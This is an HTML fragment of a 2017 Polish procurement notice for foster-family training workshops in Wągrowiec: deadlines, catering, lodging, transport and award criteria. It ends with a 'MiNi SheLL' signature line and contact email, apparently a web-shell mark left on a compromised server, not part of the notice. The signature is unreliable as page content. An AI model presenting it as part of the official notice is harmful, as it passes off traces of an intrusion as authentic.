stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca zastrzegł nie później niż w terminie składania ofert w odniesieniu do tych informacji, że nie mogą być one udostępnione innym uczestnikom postępowania. Przez tajemnicę przedsiębiorstwa rozumie się nie ujawnione do wiadomości publicznej informacje techniczne, technologiczne, handlowe lub organizacyjne przedsiębiorstwa co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności.</span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-10-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">15:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>I część zamówienia: Warsztaty stacjonarne dla rodzin zastępczych i rodzinnych domów dziecka z powiatu wągrowieckiego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Warsztaty obejmują łącznie 30 modułów, w tym 1 moduł wynosi 8h szkoleniowych, uwzględniający co najmniej 1 przerwę na obiad i 2 przerwy kawowe. Problematyka warsztatów obejmuje między innymi:- uzależnienia od narkotyków, dopalaczy, alkoholu, Internetu oraz inne cywilizacyjne zagrożenia,- prowadzenie rozmów o dojrzewaniu, seksualności i związanych z tym zagrożeniami, specyfika przemocy seksualnej oraz aspekty prawne,- praca nad własnym stylem komunikowania się z dzieckiem w sytuacjach trudnych,- sposoby interwencji w sytuacjach kryzysowych w rodzinie zastępczej, granice, normy i zasady w wychowaniu - jak je ustalać i egzekwować,- stosowanie kar i nagród w wychowaniu - sposoby nagradzania i delegowania odpowiedzialności ,- stosowanie techniki naturalnych i logicznych konsekwencji,- wypracowanie systemu współpracy wychowawczej w relacjach rodzina zastępcza - Koordynator rodziny zastępczej. W jednym module warsztatowym uczestniczyć będzie maksymalnie 30 osób. W zakresie kwalifikacji specjalistów wymagane jest wykształcenie wyższe kierunkowe, zgodnie z przedmiotem zamówienia, min. 2 letnie doświadczenie w poradnictwie rodzinnym. Zamówienie obejmuje:a.	Wynagrodzenie trenera 240h łącznie w 30 modułach, w kosztach wynagrodzenia należy uwzględnić zapewnienie przez prowadzącego: listy obecności, zaświadczeń z ukończenia szkolenia, materiały dla uczestników szkolenia - notatnik z długopisem 1 kpl. dla każdej osoby przez cały okres trwania szkolenia. b.	Wynajem Sali na terenie miasta Wągrowca, wyposażonej w niezbędne meble: stoły, krzesła, pozwalające jednorazowo uczestniczyć w szkoleniu 30 osobom, z dostępem do pomieszczeń sanitarnych wyposażonych w podstawowe środki higieny: papier toaletowy, ręczniki papierowe ( suszarka do rąk ), mydło do rąk. Sala wyposażona w projektor multimedialny. c.	Catering dla każdej osoby uczestniczącej w szkoleniu ( obiad 1 daniowy ), kawa herbata, woda, susz konferencyjny, naczynia jednorazowe. W zakresie dostawy cateringu muszą być spełnione dwa warunki:- dostawca cateringu musi być Podmiotem Ekonomii Społecznej, zgodnie z definicją zawartą w Wytycznych w zakresie przedsięwzięć w obszarze włączenia społecznego i zwalczania ubóstwa z wykorzystaniem środków Europejskiego Funduszu Społecznego i Europejskiego Funduszu Rozwoju Regionalnego na lata 2014 - 2020, - dostawca cateringu musi posiadać uprawnienia do prowadzenia działalności będącej przedmiotem zamówienia - usług cateringu.Miejsce szkoleń - miasto Wągrowiec.Termin realizacji szkoleń od podpisania umowy tj. przybliżony termin pierwszy weekend listopada 2017 roku do grudnia 2018 roku, w tym 10 modułów w 2017 roku i 20 modułów w 2018r. w systemie weekendowym - sobota w godzinach 12.00 do 20.00<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80500000-9, 55300000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-11-04<br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie w organizacji szkolenia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Wykonawca zobowiązuje się do oznakowania miejsc, z których korzystać będą uczestnicy poprzez umieszczenie plakatów informacyjnych dotyczących projektu oraz współfinansowania przez Unię Europejską (dostarczonych przez Zamawiającego). <br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>II część zamówienia: Cztery warsztaty wjazdowe dla rodzinnych form pieczy zastępczej z powiatu wągrowieckiego.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wszystkie spośród czterech wyjazdów zorganizowanie muszą być na terenie województwa Wielkopolskiego, z wyłączeniem powiatu wągrowieckiego. Wymagania dotyczące transportu: Zapewnienie transportu na trasie Wągrowiec - miejsce docelowe, miejsce docelowe - Wągrowiec. Autokar powinien być sprawny technicznie, wykonawca usługi transportu posiada wszelkie uprawnienia do wykonywania odpłatnego transportu drogowego, stosownie do treści ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2016 r. poz. 1907 z późn. zm.). W przypadku awarii pojazdu lub innej nieprzewidzianej sytuacji, prowadzącej do niepodstawienia właściwego środka transportu, Wykonawca ma obowiązek zapewnić przewóz autokarowy zastępczy bez dodatkowej opłaty. Wymagania odnośnie bazy lokalowej: Obiekt oraz teren (gdzie ma być zorganizowane szkolenie ), muszą spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określone przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Zamawiający wyklucza zakwaterowanie w ośrodkach o niskim standardzie. Uczestnicy winni zostać zakwaterowani w pokojach 2, 3 i 4 osobowych (osobne łóżka), z pełnym węzłem sanitarnym (natrysk, umywalka, WC), bieżąca ciepła woda przez całą dobę, stały dostęp do papieru toaletowego, co najmniej dwa ręczniki. Zamawiający nie dopuszcza kwaterowania w pokojach wyposażonych w łóżka piętrowe, łoża małżeńskie lub kanapy traktowane jako 2 miejsca do spania. Na terenie Ośrodka musi znajdować się kryty basen rekreacyjny, wanna z hydromasażem, sauna, pokój zabaw dla dzieci. Wymagania żywieniowe:Zapewnienie pełnego wyżywienia uczestnikom w każdym dniu pobytu tj. trzy posiłki dziennie: śniadanie w formie stołu szwedzkiego winno zawierać co najmniej: pieczywo ciemne i jasne, 1 danie ciepłe np. parówki, jajecznica, naleśniki; wędliny różne, sery różne, masło, dżemy, płatki śniadaniowe, mleko ciepłe i zimne, świeże warzywa i owoce, kawa herbata, itp.; dwudaniowy obiad z napojem, Kolacje winny zawierać co najmniej: pieczywo ciemne i jasne, przystawki różne, ewentualne dania ciepłe, wędliny różne, sery różne, świeże warzywa i owoce, woda mineralna, kawa zbożowa, herbata. Liczba posiłków adekwatna do dni pobytu. Wymagania odnośnie ubezpieczenia:Wykonawca zapewnia ubezpieczenie NNW, obejmujące moment wyjazdu uczestników z miejsca zbiórki do momentu przyjazdu powrotnego. Wykonawca ubezpieczy wszystkich uczestników wyjazdu na kwotę minimum 10.000 zł na osobę, Wykonawca przed rozpoczęciem wyjazdu przedstawi potwierdzenie zawarcia ubezpieczenia NNW wraz ze wskazaniem sposobu ubiegania się o ewentualną wypłatę środków. Wymagania dotyczące kadry: W zakresie kwalifikacji specjalistów wymagane jest wykształcenie wyższe kierunkowe, zgodnie z przedmiotem zamówienia, min. 2 letnie doświadczenie w poradnictwie rodzinnym.Wykaz kadry musi zawierać informacje o kwalifikacjach i doświadczeniu zawodowym w pracy z rodziną i wychowankami w rodzinie. W przypadku konieczności zmiany w obsadzie kadrowej, Wykonawca jest zobowiązany poinformować o tym Zamawiającego oraz przedłożyć dokumenty dotyczące odpowiednich uprawnień, Zamawiający zastrzega możliwość sprawdzenia dokumentów potwierdzających kwalifikacje oraz doświadczenia kadry prowadzącej zajęcia. Wykonawca zapewni jedną osobę, która będzie sprawować bezpośredni nadzór nad prawidłową realizacją w trakcie wyjazdu. Opieka medyczna: Dostęp do opieki lekarskiej w ramach ubezpieczenia zdrowotnego poprzez zapewnienie w koniecznych przypadkach opieki lekarskiej, polegającej na wezwaniu do ośrodka lekarza lub niezwłocznym dowiezieniu uczestnika do punktu opieki zdrowotnej. Na terenie ośrodka musi znajdować się apteczka wyposażona w środki pierwszej pomocy. Wymagane dokumenty: 1/. Informacja o miejscowości oraz nazwie ośrodka do którego będzie wyjazd wraz z danymi kontaktowymi do tego ośrodka, 2/. Program i harmonogram pobytu uwzględniający zajęcia dla opiekunów i wychowanków. 1/. Warsztat wyjazdowy dla rodzinnych form pieczy zastępczej z rodzin zawodowych i rodzinnych domów dziecka. W warsztacie uczestniczyć będą łącznie 84 osoby, w tym 28 opiekunów i 56 wychowanków z rodzin zastępczych zawodowych i rodzinnych domach dziecka. Problematyka warsztatu: ,, Trudności w procesie usamodzielnienia pełnoletnich wychowanków pozostających w rodzinach zastępczych", Przedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 84 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu ( Wągrowiec- siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca - siedziby PCPR ),3/. zapewnienie Sal szkoleniowych dla czterech grup, 4/. zapewnienie co najmniej 4 trenerów dla poszczególnych grup szkoleniowych: a.	rodziców zastępczych: I grupa - 14 osób x 20h szkolenia, II grupa - 14 osób x 20h szkolenia, b.	wychowanków w rodzinach zastępczych, dzieci biologicznych ( otoczenie ): I grupa 23 osoby x 20h szkolenia, II grupa - 23 osoby x 20h szkolenia.5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku, zakwaterowania, wyżywienia i transportu. 6/. zapewnienie drobnego poczęstunku w trakcie szkoleń dla grupy rodziców (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), dla wychowanków w rodzinach: woda, napoje, susz konferencyjny, naczynia jednorazowe),7/. zapewnienie animatora zajęć ( w tym osoby do opieki, zgodnie z obowiązującymi przepisami ) Dla około 10 dzieci w wieku od 3 do 7 lat przez 20h warsztatów, w których będą uczestniczyć opiekunowie. 8/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Planowany termin realizacji zamówienia: Marzec 2018r.2/. Warsztat wyjazdowy dla rodzinnych form pieczy zastępczej z rodzin spokrewnionych i niezawodowych.W warsztacie uczestniczyć będzie łącznie 80 osób, w tym 44 opiekunów i 36 wychowanków z rodzin zastępczych spokrewnionych i niezawodowych. Problematyka warsztatu: ,, Trudności w procesie usamodzielnienia pełnoletnich wychowanków pozostających w rodzinach zastępczych ,,. Przedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 80 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu ( Wągrowiec- siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca ( siedziby PCPR ),3/. zapewnienie Sal szkoleniowych dla czterech grup, 4/.zapewnienie co najmniej 4 trenerów dla poszczególnych grup szkoleniowych: c.	rodziców zastępczych: I grupa - 22 osoby x 20h szkolenia, II grupa - 22 osoby x 20h szkolenia, d.	wychowanków w rodzinach zastępczych, dzieci biologicznych ( otoczenie ): I grupa 13 osób x 20h szkolenia, II grupa - 13 osób x 20h szkolenia.5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku oraz zakwaterowania i wyżywienia, 6/. zapewnienie drobnego poczęstunku w trakcie szkoleń dla grupy rodziców (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), dla wychowanków w rodzinach: woda, napoje, susz konferencyjny, naczynia jednorazowe), 7/. zapewnienie osoby do opieki ( zgodnie z obowiązującymi przepisami ) animatora zajęć dla 10 dzieci w wieku od 3 do 7 lat przez 20h warsztatów, w których będą uczestniczyć opiekunowie. 8/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Planowany termin realizacji zamówienia: Kwiecień 2018r. ( wyjazd w systemie częściowo weekendowym tj. od czwartku do niedzieli )3/. Dwa wyjazdy warsztatowe dla Pań pełniących funkcję rodziny zastępczej i rodzinnego domu dziecka. Łącznie w warsztatach uczestniczyć będzie 77 kobiet. Problematyka warsztatów: ,,Wypalenie zawodowe i przeciwdziałanie rezygnacji z pełnienia funkcji rodziny zastępczej", w tym : - efektywne funkcjonowanie w sytuacji stresu i konfliktu, styl i strategia radzenia sobie ze stresem, zarządzaniem konfliktem - 15h- wypalenie zawodowe - rozpoznawanie i przeciwdziałanie, w tym przyczyny wypalenia, wzmocnienia własnych zasobów - 20ha. warsztat wyjazdowy dla 37 osób - kobiet z rodzin zastępczych zawodowych i rodzinnych domów dziecka.Przedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 37 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu (Wągrowiec - siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca ( siedziby PCPR ),3/. zapewnienie Sali szkoleniowej, 4/.zapewnienie co najmniej 2 trenerów - łącznie 35h szkolenia, 5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku oraz zakwaterowania i wyżywienia, 6/. zapewnienie drobnego poczęstunku w trakcie szkolenia (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), 7/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Termin szkolenia: Listopad 2017r. ( wyjazd w systemie częściowo weekendowym tj. od czwartku do niedzieli )b. warsztat wyjazdowy dla 40 osób - kobiet z rodzin niezawodowych i spokrewnionychPrzedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 40 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu (Wągrowiec - siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca ( siedziby PCPR ),3/. zapewnienie Sali szkoleniowej , 4/.zapewnienie co najmniej 2 trenerów - łącznie 35h szkolenia, 5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku oraz zakwaterowania i wyżywienia, 6/. zapewnienie drobnego poczęstunku w trakcie szkolenia (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), 7/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Termin szkolenia: Czerwiec 2018r. ( wyjazd w systemie częściowo weekendowym tj. od czwartku do niedzieli )<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80500000-9, 63500000-4, 55300000-3, 55100000-1, 60172000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-11-11<br/>data zakończenia: 2018-09-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie w organizacji szkolenia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>b.	Wykonawca zobowiązuje się do oznakowania miejsc, z których korzystać będą uczestnicy poprzez umieszczenie plakatów informacyjnych dotyczących projektu oraz współfinansowania przez Unię Europejską (dostarczonych przez Zamawiającego). <br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>III część zamówienia: Warsztaty stacjonarne dla rodzinnych form pieczy zastępczej - przeciwdziałanie uzależnieniom.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Program warsztatów obejmuje działania mające na celu przeciwdziałaniu uzależnieniom, podnoszenie kompetencji i umiejętności postepowania, reagowania i szukania pomocy, działania opiekunów młodzieży uzależnionej lub zagrożonej uzależnieniem. Warsztaty skierowane są do 20 wychowanków z pieczy zastępczej oraz 30 opiekunów - łącznie 50 osób.W zakresie kwalifikacji specjalistów wymagane jest wykształcenie wyższe kierunkowe, zgodnie z przedmiotem zamówienia. Przedmiot zamówienia obejmuje:1.	Warsztaty grupowe dla młodzieży i opiekunów ze specjalistą psychologiem - 20h ( wynagrodzenie specjalisty)2.	Warsztaty grupowe dla młodzieży i opiekunów ze specjalistą terapeutą uzależnień - 25h ( wynagrodzenie specjalisty )3.	Dostęp do konsultacji indywidualnych ze specjalistą psychologiem/terapeutą uzależnień dla każdego uczestnika projektu w wymiarze 1h tj. łącznie 50h4.	Wynajem Sali dla warsztatów grupowych i konsultacji indywidulanych 5.	Zapewnienie materiałów w przypadku warsztatów grupowych ( notatnik + długopis )6.	Zapewnienie drobnego poczęstunku ( napoje, susz konferencyjny, naczynia jednorazowe) na spotkaniach grupowych.Miejsce realizacji zamówienia miasto Wągrowiec.Termin realizacji zamówienia: od podpisania umowy tj. przybliżony termin pierwszych zajęć miesiąc listopad 2017r. ( od poniedziałku do piątku w godzinach popołudniowych )<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80500000-9, 55300000-3, 63500000-4, 55100000-1, 60172000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-11-11<br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie w organizacji szkolenia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Wykonawca zobowiązuje się do oznakowania miejsc, z których korzystać będą uczestnicy poprzez umieszczenie plakatów informacyjnych dotyczących projektu oraz współfinansowania przez Unię Europejską (dostarczonych przez Zamawiającego). <br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com